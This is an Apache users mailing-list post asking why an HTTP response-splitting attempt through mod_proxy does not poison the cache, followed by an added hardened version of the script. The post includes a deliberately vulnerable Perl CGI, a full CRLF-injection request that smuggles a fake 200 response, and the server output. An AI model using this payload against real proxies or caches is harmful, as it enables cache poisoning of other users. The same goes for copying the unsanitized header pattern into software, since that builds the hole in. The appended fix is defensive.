Http splitting does not work with mod_proxy

Hi list.

Hope somebody will spend some time on my question :),
or point me to the right list.

Does HTTP splitting still work in fresh versions of common applications
of Apache?

I've written a sample application (CGI script) vulnerable to it, however
Apache mod_proxy just ignores the answer, and initiates a new
connection for each request.

Chain:

Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi.
Proxy is on localhost.
Goal: poison mod_proxy's cache
The cgi is:

#!/usr/bin/perl
use CGI qw(:standard);
print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attempt to exploit is:

#nc localhost 80
GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>
HTTP/1.1
Host: test.xxx

HTTP/1.1 302 Moved
Date: Thu, xx Nov 2007 xx:25:03 GMT
Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
Location: Foo
Content-Length: 0
Content-Type: text/plain
Via: 1.1 client.xxx (Apache/2.xx)

GET http://test.xxx/1.html HTTP/1.1
Host: test.xxx

HTTP/1.1 200 OK
Date: Thu, xx Nov 2007 15:25:09 GMT
Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
Last-Modified: Thu, xx Nov 2007 xxx GMT
ETag: "2c8be-2-c4f7b640"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html


1

However, as I've found, mod_proxy initiates a new connection for the
second GET. That breaks the whole idea of exploiting HTTP splitting. Is
it some kind of new protection feature in Apache mod_proxy?
Please, could anybody provide a brief description of common
applications on which the attack works. It seems vendors have done a
great job (like filtering characters in PHP header, or Tomcat).

Feel free to ask any questions to get more info.

-- 
Best regards.
Gleb Pakharenko.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
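
The CGI in the message above copies param('name') straight into the Location header, so whether a split response reaches a cache depends entirely on what sits in front of it. As an added example (not part of the original post), here is the same script with the header value checked before it is printed. The helper name safe_location and the rule that redirect targets are local paths or http(s) URLs are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not from the original post: hardened form of the CGI above.
use strict;
use warnings;
use CGI qw(:standard);

# safe_location is a hypothetical helper: it returns the value when it is
# safe to place in a Location header, and undef otherwise.
# Assumption: redirect targets are local paths or absolute http(s) URLs.
sub safe_location {
    my ($value) = @_;
    return undef unless defined $value && length $value;

    # CGI.pm has already URL-decoded the parameter, so %0d%0a arrives here
    # as real CR/LF bytes. Reject those and every other control character:
    # they are what lets a parameter end the header block early.
    return undef if $value =~ /[\x00-\x1f\x7f]/;

    # Allow-list the overall shape and a conservative character set.
    # This does not decide which hosts are acceptable redirect targets.
    return undef
        unless $value =~ m{\A(?:https?://|/)[A-Za-z0-9_.~:/?&=%+-]*\z};

    return $value;
}

# scalar() forces a single value even if 'name' is supplied more than once.
my $target = safe_location(scalar param('name'));

if (defined $target) {
    print "Status: 302 Moved\nLocation: $target\n\n";
} else {
    # Fail closed: a rejected value is never echoed into any header.
    print "Status: 400 Bad Request\nContent-Type: text/plain\n\n";
    print "Invalid redirect target\n";
}
```

With this check the request shown in the message gets a 400 response, because the decoded name parameter contains CR and LF.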

